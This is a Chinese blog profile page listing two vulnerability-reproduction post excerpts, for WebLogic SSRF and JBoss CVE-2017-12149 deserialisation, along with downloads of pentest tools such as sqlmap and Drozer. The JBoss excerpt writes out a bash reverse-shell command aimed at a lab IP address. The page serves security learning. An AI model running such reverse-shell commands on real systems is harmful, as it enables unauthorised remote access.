自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(2)
  • 资源 (8)
  • 收藏
  • 关注

原创 Weblogic-SSRF漏洞复现

Weblogic-SSRF漏洞复现 记一次Weblogic-SSRF漏洞复现过程 0x01****ssrf简介 SSRF(server-side request forgery ):服务器端请求伪造。是一种由攻击者构造形成由服务器端发起请求的一个安全漏洞,一般情况下,ssrf攻击的目标是从外网无法访问的内部系统 0x02环境搭建 Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 环境如下: http://192.168.10.1

2020-08-24 17:39:09 224

原创 JBoss JMXInvokerServlet 反序列化漏洞

JBoss JMXInvokerServlet 反序列化漏洞(CVE-2017-12149) 记一次JBoss反序列化漏洞复现过程 如图,搭建一个JBoss环境 (备注:CVE-2017-12149适用JBoss版本:5.x / 6.x) 漏洞原理: 该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化 编写反弹shell命令: bash -i >& /dev/tcp/192.168.10.100/21 0>&1 由于Run

2020-08-21 14:27:39 473

火狐浏览器(渗透专版)-解压即可使用.zip

此款为火狐浏览器,渗透专版,已安装的插件很全面。引擎反应更快,内存占用少,还有众多新功能。解压即可使用

2020-06-28

最新版sqlmap1.3.4.zip

自动化注入工具,支持如下数据库:MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。适用环境python2

2020-06-28

文件搜索工具(FileLocator Pro)V8.2中文便携版.zip

FileLocator Pro 是一款非常专业的搜索工具,不仅能搜索文件名,更擅长对指定文件和目录进行全文搜索,并且支持多种搜索表达式以及日期属性等细节设定,快速准确定位您所需要的文档,提高搜索效率。

2020-06-12

Android APP安全评估工具-Drozer.zip

drozer安装包,适用于windows平台,亲测可用。官网下载速度特别慢!不为积分,只为大家方便。

2020-06-12

CyberChef-master.zip

CyberChef是一个简单、直观的web应用程序,用于在web浏览器中执行各种网络操作。这些操作包括简单的编码(如XOR或Base64)、更复杂的加密(如AES、DES和Blowfish)、创建二进制文件和hexdump、数据的压缩和解压缩、计算散列和校验和、IPv6和X.509解析、更改字符编码等。

2020-06-12

jython-standalone-2.7.0(最新版本)

一个将Python代码转换成Java代码的编译器,能够将自己用Python代码写的类库用在Java程序里,有需要的可以下载,亲测可用。 如果windows的用户安装插件有问题的,尝试一下换这个jython: Jython官网: https://www.jython.org/downloads.html Jython环境安装包: http://search.maven.org/remotecontent?filepath=org/python/jython-standalone/2.7.0/jython-standalone-2.7.0.jar

2019-04-17

新版sqlmap

自动化注入工具,支持如下数据库:MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。

2019-04-10

火狐浏览器-渗透专版(便携)

火狐浏览器,是Mozilla开发的一款网页浏览器。火狐浏览器使用Gecko排版引擎,支持多种操作系统,包含隐私保护、分页浏览、全球通用、智能地址栏等性能。

2019-04-05

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除